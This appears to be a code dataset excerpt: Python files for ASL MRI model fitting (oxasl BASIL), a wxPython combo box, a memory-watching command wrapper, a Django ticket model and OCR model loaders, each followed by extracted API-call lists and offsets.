# which are None (e.g. sliceband) are not passed to Fabber
options = {
"data" : asldata,
"model" : "asl_multite",
"method" : "vb",
"noise" : "white",
"allow-bad-voxels" : True,
"max-iterations" : 20,
"convergence" : "trialmode",
"max-trials" : 10,
"save-mean" : True,
"save-mvn" : True,
"save-std" : True,
"save-model-fit" : True,
}
if mask is not None:
options["mask"] = mask
# We choose to pass TIs (not PLDs). The asldata object ensures that
# TIs are correctly derived from PLDs, when these are specified, by adding
# the bolus duration.
_list_option(options, asldata.tis, "ti")
# Pass multiple TEs
_list_option(options, asldata.tes, "te")
# Bolus duration must be constant for multi-TE model
if min(asldata.taus) != max(asldata.taus):
raise ValueError("Multi-TE model does not support variable bolus durations")
else:
options["tau"] = asldata.taus[0]
# Repeats must be constant for multi-TE model
if min(asldata.rpts) != max(asldata.rpts):
raise ValueError("Multi-TE model does not support variable repeats")
else:
options["repeats"] = asldata.rpts[0]
# Other asl data parameters
for attr in ("casl", "slicedt", "sliceband"):
if getattr(asldata, attr, None) is not None:
options[attr] = getattr(asldata, attr)
# Keyword arguments override options
options.update(kwargs)
# Additional optional workspace arguments
for attr in ("t1", "t1b", "t2", "t2b"):
value = getattr(wsp, attr)
if value is not None:
if attr.startswith("t2"):
# Model expects T2 in seconds not ms
options[attr] = float(value) / 1000
else:
options[attr] = value
# Options for final spatial step
prior_type_spatial = "M"
prior_type_mvs = "A"
options_svb = {
"method" : "spatialvb",
"param-spatial-priors" : "N+",
"convergence" : "maxits",
"max-iterations": 20,
}
wsp.log.write("Model (in fabber) is : %s\n" % options["model"])
# Set general parameter inference and inclusion
if not wsp.infertiss:
wsp.log.write("WARNING: infertiss=False but ftiss is always inferred in multi-TE model\n")
if not wsp.inferbat:
wsp.log.write("WARNING: inferbat=False but BAT is always inferred in multi-TE model\n")
if wsp.inferart:
wsp.log.write("WARNING: inferart=True but multi-TE model does not support arterial component\n")
if wsp.infertau:
options["infertau"] = True
if wsp.infert1:
options["infert1"] = True
if wsp.infert2:
options["infert2"] = True
# Keep track of the number of spatial priors specified by name
spriors = 1
if wsp.initmvn:
# we are being supplied with an initial MVN
wsp.log.write("Initial MVN being loaded %s\n" % wsp.initmvn.name)
options["continue-from-mvn"] = wsp.initmvn
# T1 image prior
if wsp.t1im:
spriors = _add_prior(options, spriors, "T_1", type="I", image=wsp.t1im)
# BAT image prior
if wsp.batim is not None:
# With a BAT image prior we must include BAT even if we are not inferring it
# (in this case the image prior will be treated as ground truth)
spriors = _add_prior(options, spriors, "delttiss", type="I", image=wsp.batim)
options["incbat"] = True
steps = []
components = ""
### --- TISSUE MODULE ---
#if wsp.infertiss:
if True:
components += " Tissue"
### Inference options
if wsp.infertau:
components += " Bolus duration"
options["infertau"] = True
if wsp.infert1:
components += " T1"
options["infert1"] = True
if wsp.infertexch:
components += " Exchange time"
options["infertexch"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# Setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "ftiss", type=prior_type_spatial)
### --- SPATIAL MODULE ---
if wsp.spatial:
step_desc = "Spatial VB - %s" % components
options.update(options_svb)
del options["max-trials"]
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- SINGLE-STEP OPTION ---
if wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
if not steps:
raise ValueError("No steps were generated - no parameters were set to be inferred")
return steps
def _list_option(options, values, name):
for idx, value in enumerate(values):
options["%s%i" % (name, idx+1)] = value
def _add_prior(options, prior_idx, param, **kwargs):
options["PSP_byname%i" % prior_idx] = param
for key, value in kwargs.items():
options["PSP_byname%i_%s" % (prior_idx, key)] = value
return prior_idx + 1
class Step(object):
"""
A step in the Basil modelling process
"""
def __init__(self, wsp, options, desc):
self.options = dict(options)
self.desc = desc
# Need to convert all images to target image space
for key in list(options.keys()):
poss_img = self.options[key]
if isinstance(poss_img, Image):
image_space = wsp.ifnone("image_space", "native")
self.options[key] = reg.change_space(wsp, poss_img, image_space, mask=(key == 'mask'))
class FabberStep(Step):
"""
A Basil step which involves running Fabber
"""
def run(self, prev_output, log=sys.stdout, fsllog=None, **kwargs):
"""
Run Fabber, initialising it from the output of a previous step
"""
if prev_output is not None:
self.options["continue-from-mvn"] = prev_output["finalMVN"]
from .wrappers import fabber
ret = fabber(self.options, output=LOAD, progress_log=log, log=fsllog, **kwargs)
log.write("\n")
return ret
class PvcInitStep(Step):
"""
A Basil step which initialises partial volume correction
"""
def run(self, prev_output, log=sys.stdout, fsllog=None, **kwargs):
"""
Update the MVN from a previous step to include initial estimates
for PVC parameters
"""
log.write("Initialising partial volume correction...\n")
# set the inital GM amd WM values using a simple PV correction
wm_cbf_ratio = 0.4
# Modified pvgm map
temp_pgm = np.copy(self.options["pgm"].data)
temp_pgm[temp_pgm < 0.2] = 0.2
# First part of correction psuedo WM CBF term
prev_ftiss = prev_output["mean_ftiss"].data
wm_cbf_term = (prev_ftiss * wm_cbf_ratio) * self.options["pwm"].data
gmcbf_init = (prev_ftiss - wm_cbf_term) / temp_pgm
wmcbf_init = gmcbf_init * wm_cbf_ratio
mvn = prev_output["finalMVN"]
gmcbf_init = Image(gmcbf_init, header=mvn.header)
wmcbf_init = Image(wmcbf_init, header=mvn.header)
# HACK: This seems to be required to get the fslpy decorators to write
# the temporary file correctly
mask = Image(self.options["mask"].data, header=self.options["mask"].header)
# load these into the MVN
mvn = prev_output["finalMVN"]
from .wrappers import mvntool
params = prev_output["paramnames"]
mvn = mvntool(mvn, params.index("ftiss")+1, output=LOAD, mask=mask, write=True, valim=gmcbf_init, var=0.1, log=fsllog)["output"]
mvn = mvntool(mvn, params.index("fwm")+1, output=LOAD, mask=mask, write=True, valim=wmcbf_init, var=0.1, log=fsllog)["output"]
log.write("DONE\n")
return {"finalMVN" : mvn, "gmcbf_init" : gmcbf_init, "wmcbf_init" : wmcbf_init}
class BasilOptions(OptionCategory):
"""
BASIL option category
"""
def __init__(self):
OptionCategory.__init__(self, "basil")
def groups(self, parser):
groups = []
group = OptionGroup(parser, "BASIL options")
group.add_option("--infertau", help="Infer bolus duration", action="store_true", default=False)
group.add_option("--inferart", help="Infer macro vascular (arterial) signal component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--inferpc", help="Infer pre-capillary signal component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--infert1", help="Include uncertainty in T1 values", action="store_true", default=False)
group.add_option("--infertexch", help="Infer exchange time (multi-TE data only)", action="store_true", default=False)
group.add_option("--artonly", help="Remove tissue component and infer only arterial component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--fixbat", help="Fix bolus arrival time", action="store_false", default=True)
group.add_option("--batsd", help="Bolus arrival time standard deviation (s) - default 1.0 for multi-PLD, 0.1 otherwise", type=float)
group.add_option("--spatial", help="Add step that implements adaptive spatial smoothing on CBF", action="store_true", default=False)
group.add_option("--fast", help="Faster analysis (1=faster, 2=single step", type=int, default=0)
group.add_option("--noiseprior", help="Use an informative prior for the noise estimation", action="store_true", default=False)
group.add_option("--noisesd", help="Set a custom noise std. dev. for the nosie prior", type=float)
group.add_option("--basil-mask", help="Masking policy to use for Basil model fitting. Does not affect analysis mask used in rest of pipeline. 'dilate' means dilate the default analysis mask. 'none' means use no masking",
type="choice", choices=["default", "dilated", "none"])
group.add_option("--basil-options", "--fit-options", help="File containing additional options for model fitting step", type="optfile")
groups.append(group)
group = OptionGroup(parser, "Model options")
group.add_option("--disp", help="Model for label dispersion", default="none")
group.add_option("--exch", help="Model for tissue exchange (residue function)", default="mix")
groups.append(group)
group = OptionGroup(parser, "Partial volume correction / CBF estimation (enforces --spatial)")
group.add_option("--pgm", help="Gray matter PV map", type="image")
group.add_option("--pwm", help="White matter PV map", type="image")
groups.append(group)
group = OptionGroup(parser, "Special options")
group.add_option("--t1im", help="Voxelwise T1 tissue estimates", type="image")
group.add_option("--batim", "--attim", help="Voxelwise BAT (ATT) estimates in seconds", type="image")
groups.append(group)
return groups
def main():
"""
Entry point for BASIL command line application
"""
try:
parser = AslOptionParser(usage="basil -i <ASL input file> [options...]", version=__version__)
parser.add_category(image.AslImageOptions())
parser.add_category(BasilOptions())
parser.add_category(GenericOptions())
options, _ = parser.parse_args(sys.argv)
if not options.output:
options.output = "basil"
if not options.asldata:
sys.stderr.write("Input file not specified\n")
parser.print_help()
sys.exit(1)
asldata = AslImage(options.asldata, **parser.filter(options, "image"))
wsp = Workspace(savedir=options.output, **vars(options))
wsp.asldata = asldata
# Deal with --artonly
if wsp.artonly:
wsp.infertiss = False
wsp.inferart = True
# Adjust number of iterations based on fast option
if not wsp.fast:
num_iter, num_trials, onestep = 20, 10, False
elif wsp.fast == 1:
num_iter, num_trials, onestep = 5, 2, False
elif wsp.fast == 2:
num_iter, num_trials, onestep = 10, 5, True
else:
raise ValueError("Not a valid option for fast: %s" % str(wsp.fast))
wsp.max_iterations = num_iter
wsp.max_trials = num_trials
wsp.onestep = onestep
# Run BASIL processing, passing options as keyword arguments using **
basil(wsp)
except ValueError as exc:
sys.stderr.write("\nERROR: " + str(exc) + "\n")
sys.stderr.write("Use --help for usage information\n")
sys.exit(1)
if __name__ == "__main__":
main()
|
[
"oxasl.image.AslImageOptions",
"numpy.copy",
"math.sqrt",
"oxasl.options.OptionGroup",
"numpy.ones",
"fsl.data.image.Image",
"numpy.amax",
"sys.stderr.write",
"numpy.mean",
"numpy.array",
"oxasl.reg.change_space",
"oxasl.options.AslOptionParser",
"oxasl.options.GenericOptions",
"sys.exit",
"oxasl.options.OptionCategory.__init__"
] |
[((9452, 9497), 'fsl.data.image.Image', 'Image', (['tis_arr'], {'header': "options['data'].header"}), "(tis_arr, header=options['data'].header)\n", (9457, 9497), False, 'from fsl.data.image import Image\n'), ((14347, 14368), 'numpy.copy', 'np.copy', (['pgm_img.data'], {}), '(pgm_img.data)\n', (14354, 14368), True, 'import numpy as np\n'), ((14383, 14404), 'numpy.copy', 'np.copy', (['pwm_img.data'], {}), '(pwm_img.data)\n', (14390, 14404), True, 'import numpy as np\n'), ((14523, 14556), 'fsl.data.image.Image', 'Image', (['pgm'], {'header': 'pgm_img.header'}), '(pgm, header=pgm_img.header)\n', (14528, 14556), False, 'from fsl.data.image import Image\n'), ((14571, 14604), 'fsl.data.image.Image', 'Image', (['pwm'], {'header': 'pwm_img.header'}), '(pwm, header=pwm_img.header)\n', (14576, 14604), False, 'from fsl.data.image import Image\n'), ((26244, 26277), 'numpy.copy', 'np.copy', (["self.options['pgm'].data"], {}), "(self.options['pgm'].data)\n", (26251, 26277), True, 'import numpy as np\n'), ((26668, 26704), 'fsl.data.image.Image', 'Image', (['gmcbf_init'], {'header': 'mvn.header'}), '(gmcbf_init, header=mvn.header)\n', (26673, 26704), False, 'from fsl.data.image import Image\n'), ((26726, 26762), 'fsl.data.image.Image', 'Image', (['wmcbf_init'], {'header': 'mvn.header'}), '(wmcbf_init, header=mvn.header)\n', (26731, 26762), False, 'from fsl.data.image import Image\n'), ((26897, 26965), 'fsl.data.image.Image', 'Image', (["self.options['mask'].data"], {'header': "self.options['mask'].header"}), "(self.options['mask'].data, header=self.options['mask'].header)\n", (26902, 26965), False, 'from fsl.data.image import Image\n'), ((27620, 27658), 'oxasl.options.OptionCategory.__init__', 'OptionCategory.__init__', (['self', '"""basil"""'], {}), "(self, 'basil')\n", (27643, 27658), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((27727, 27763), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""BASIL options"""'], {}), "(parser, 'BASIL options')\n", (27738, 27763), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((29833, 29869), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Model options"""'], {}), "(parser, 'Model options')\n", (29844, 29869), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30105, 30195), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Partial volume correction / CBF estimation (enforces --spatial)"""'], {}), "(parser,\n 'Partial volume correction / CBF estimation (enforces --spatial)')\n", (30116, 30195), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30389, 30427), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Special options"""'], {}), "(parser, 'Special options')\n", (30400, 30427), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30783, 30872), 'oxasl.options.AslOptionParser', 'AslOptionParser', ([], {'usage': '"""basil -i <ASL input file> [options...]"""', 'version': '__version__'}), "(usage='basil -i <ASL input file> [options...]', version=\n __version__)\n", (30798, 30872), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((9336, 9357), 'numpy.array', 'np.array', (['asldata.tis'], {}), '(asldata.tis)\n', (9344, 9357), True, 'import numpy as np\n'), ((12408, 12445), 'numpy.mean', 'np.mean', (['datamax.data[mask.data != 0]'], {}), '(datamax.data[mask.data != 0])\n', (12415, 12445), True, 'import numpy as np\n'), ((12550, 12580), 'math.sqrt', 'math.sqrt', (['(brain_mag * 2 / snr)'], {}), '(brain_mag * 2 / snr)\n', (12559, 12580), False, 'import math\n'), ((30896, 30919), 'oxasl.image.AslImageOptions', 'image.AslImageOptions', ([], {}), '()\n', (30917, 30919), False, 'from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg\n'), ((30993, 31009), 'oxasl.options.GenericOptions', 'GenericOptions', ([], {}), '()\n', (31007, 31009), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((31174, 31220), 'sys.stderr.write', 'sys.stderr.write', (['"""Input file not specified\n"""'], {}), "('Input file not specified\\n')\n", (31190, 31220), False, 'import sys\n'), ((31265, 31276), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (31273, 31276), False, 'import sys\n'), ((32275, 32329), 'sys.stderr.write', 'sys.stderr.write', (['"""Use --help for usage information\n"""'], {}), "('Use --help for usage information\\n')\n", (32291, 32329), False, 'import sys\n'), ((32338, 32349), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (32346, 32349), False, 'import sys\n'), ((5836, 5871), 'numpy.ones', 'np.ones', (['wsp.asldata.data.shape[:3]'], {}), '(wsp.asldata.data.shape[:3])\n', (5843, 5871), True, 'import numpy as np\n'), ((12282, 12316), 'numpy.amax', 'np.amax', (['wsp.diffdata_mean.data', '(3)'], {}), '(wsp.diffdata_mean.data, 3)\n', (12289, 12316), True, 'import numpy as np\n'), ((25138, 25202), 'oxasl.reg.change_space', 'reg.change_space', (['wsp', 'poss_img', 'image_space'], {'mask': "(key == 'mask')"}), "(wsp, poss_img, image_space, mask=key == 'mask')\n", (25154, 25202), False, 'from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg\n')]
|
from typing import Optional, TYPE_CHECKING
import wx
if TYPE_CHECKING:
from gui.pane import FunctionPane
# noinspection PyPep8Naming
class ArrayControl(wx.ComboBox):
# noinspection PyShadowingBuiltins
def __init__(self, parent, id):
from functions import Function
choices = list(Function.get_all_vars().keys())
super().__init__(parent, id, choices=choices, value=choices[0])
def get_pane(self, window: wx.Window) -> "FunctionPane":
from gui.pane import FunctionPane
parent = window.GetParent()
if isinstance(parent, FunctionPane):
return parent
if parent is None:
raise ValueError("Could not find a FunctionPane parent for element")
return self.get_pane(parent)
def SetValue(self, value: Optional[str]):
if value is None:
self.SetSelection(0)
else:
super().SetValue(value)
def GetValue(self):
from gui.gui import MainFrame
frame: MainFrame = self.GetTopLevelParent()
return eval(super().GetValue(), frame.get_vars(self))
def GetCode(self):
return super().GetValue()
|
[
"functions.Function.get_all_vars"
] |
[((310, 333), 'functions.Function.get_all_vars', 'Function.get_all_vars', ([], {}), '()\n', (331, 333), False, 'from functions import Function\n')]
|
import sys
import csv
import datetime
import time
import argparse
from subprocess import Popen, PIPE
class Watcher:
def __init__(self, cmd, time_interval, filename):
self.cmd = cmd
self.time_interval = time_interval
self.filename = filename
self.outputfile = open(filename, 'w')
self.writer = csv.writer(self.outputfile)
self.meminfo_keys = list(self.parse_meminfo().keys())
self.writer.writerow(['timestamp'] + self.meminfo_keys)
@staticmethod
def parse_meminfo():
with open('/proc/meminfo') as meminfo:
lines = meminfo.readlines()
result = {}
for line in lines:
name, value = line.split(':')
value = value.strip()
if value.endswith('kB'):
value = int(value[:-2])*1000
else:
value = int(value)
result[name] = value
return result
def add_measure(self):
meminfo = self.parse_meminfo()
timestamp = str(datetime.datetime.now())
self.writer.writerow([timestamp] + [meminfo[k] for k in self.meminfo_keys])
return meminfo['MemAvailable']
def run_and_watch(self):
min_mem = self.add_measure()
max_mem = min_mem
proc = Popen(self.cmd, stdout=PIPE, stderr=PIPE)
while proc.poll() is None:
time.sleep(self.time_interval)
new_mem = self.add_measure()
if new_mem > max_mem:
max_mem = new_mem
if new_mem < min_mem:
min_mem = new_mem
stdout, stderr = proc.communicate()
sys.stdout.write(stdout.decode())
sys.stderr.write(stderr.decode())
sys.stderr.write(f'Memory consumption: {(max_mem - min_mem)*1e-9:.3f} GB\n')
self.outputfile.flush()
sys.exit(proc.returncode)
def main(args):
parser = argparse.ArgumentParser(description='Monitoring of a command memory consumption')
parser.add_argument('--time_interval', '-t', type=int, default=1,
help='Period of the measures, in seconds')
parser.add_argument('--output', '-o', type=str, default='/tmp/memwatch.csv',
help='Output file for the measures')
parser.add_argument('command', type=str,
help='Command line to execute')
args = parser.parse_args(args)
watcher = Watcher(cmd=args.command.split(), time_interval=args.time_interval, filename=args.output)
watcher.run_and_watch()
if __name__ == '__main__':
main(sys.argv[1:])
|
[
"subprocess.Popen",
"csv.writer",
"argparse.ArgumentParser",
"time.sleep",
"sys.stderr.write",
"datetime.datetime.now",
"sys.exit"
] |
[((1891, 1977), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Monitoring of a command memory consumption"""'}), "(description=\n 'Monitoring of a command memory consumption')\n", (1914, 1977), False, 'import argparse\n'), ((339, 366), 'csv.writer', 'csv.writer', (['self.outputfile'], {}), '(self.outputfile)\n', (349, 366), False, 'import csv\n'), ((1284, 1325), 'subprocess.Popen', 'Popen', (['self.cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(self.cmd, stdout=PIPE, stderr=PIPE)\n', (1289, 1325), False, 'from subprocess import Popen, PIPE\n'), ((1717, 1796), 'sys.stderr.write', 'sys.stderr.write', (['f"""Memory consumption: {(max_mem - min_mem) * 1e-09:.3f} GB\n"""'], {}), "(f'Memory consumption: {(max_mem - min_mem) * 1e-09:.3f} GB\\n')\n", (1733, 1796), False, 'import sys\n'), ((1834, 1859), 'sys.exit', 'sys.exit', (['proc.returncode'], {}), '(proc.returncode)\n', (1842, 1859), False, 'import sys\n'), ((1028, 1051), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1049, 1051), False, 'import datetime\n'), ((1373, 1403), 'time.sleep', 'time.sleep', (['self.time_interval'], {}), '(self.time_interval)\n', (1383, 1403), False, 'import time\n')]
|
from django.db import models
# Create your models here.
class ticket(models.Model):
timestamp = models.DateField(auto_now_add=True,auto_now=False,)
tech = models.CharField(max_length=50,)
site = models.CharField(max_length=50,)
user = models.CharField(max_length=50,)
issue = models.CharField(max_length=200,)
tickid = models.AutoField(primary_key=True)
complete = models.BooleanField()
reqact = models.CharField(max_length=200, blank=True,)
def __unicode__(self):
return self.site
|
[
"django.db.models.DateField",
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.AutoField"
] |
[((101, 152), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)', 'auto_now': '(False)'}), '(auto_now_add=True, auto_now=False)\n', (117, 152), False, 'from django.db import models\n'), ((164, 195), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (180, 195), False, 'from django.db import models\n'), ((208, 239), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (224, 239), False, 'from django.db import models\n'), ((252, 283), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (268, 283), False, 'from django.db import models\n'), ((297, 329), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (313, 329), False, 'from django.db import models\n'), ((344, 378), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (360, 378), False, 'from django.db import models\n'), ((394, 415), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (413, 415), False, 'from django.db import models\n'), ((429, 473), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'blank': '(True)'}), '(max_length=200, blank=True)\n', (445, 473), False, 'from django.db import models\n')]
|
import torch
from vietocr.tool.config import Cfg
from vietocr.tool.predictor import Predictor
import configs as cf
from models.saliency.u2net import U2NETP
from backend.text_detect.craft_utils import get_detector
def load_text_detect():
text_detector = get_detector(cf.text_detection_weights_path, cf.device)
return text_detector
def load_saliency():
net = U2NETP(3, 1)
net = net.to(cf.device)
net.load_state_dict(torch.load(cf.saliency_weight_path, map_location=cf.device))
net.eval()
return net
def load_text_recognize():
config = Cfg.load_config_from_name("vgg_seq2seq")
config["cnn"]["pretrained"] = False
config["device"] = cf.device
config["predictor"]["beamsearch"] = False
detector = Predictor(config)
return detector
|
[
"vietocr.tool.predictor.Predictor",
"torch.load",
"vietocr.tool.config.Cfg.load_config_from_name",
"backend.text_detect.craft_utils.get_detector",
"models.saliency.u2net.U2NETP"
] |
[((260, 315), 'backend.text_detect.craft_utils.get_detector', 'get_detector', (['cf.text_detection_weights_path', 'cf.device'], {}), '(cf.text_detection_weights_path, cf.device)\n', (272, 315), False, 'from backend.text_detect.craft_utils import get_detector\n'), ((374, 386), 'models.saliency.u2net.U2NETP', 'U2NETP', (['(3)', '(1)'], {}), '(3, 1)\n', (380, 386), False, 'from models.saliency.u2net import U2NETP\n'), ((572, 612), 'vietocr.tool.config.Cfg.load_config_from_name', 'Cfg.load_config_from_name', (['"""vgg_seq2seq"""'], {}), "('vgg_seq2seq')\n", (597, 612), False, 'from vietocr.tool.config import Cfg\n'), ((747, 764), 'vietocr.tool.predictor.Predictor', 'Predictor', (['config'], {}), '(config)\n', (756, 764), False, 'from vietocr.tool.predictor import Predictor\n'), ((439, 498), 'torch.load', 'torch.load', (['cf.saliency_weight_path'], {'map_location': 'cf.device'}), '(cf.saliency_weight_path, map_location=cf.device)\n', (449, 498), False, 'import torch\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.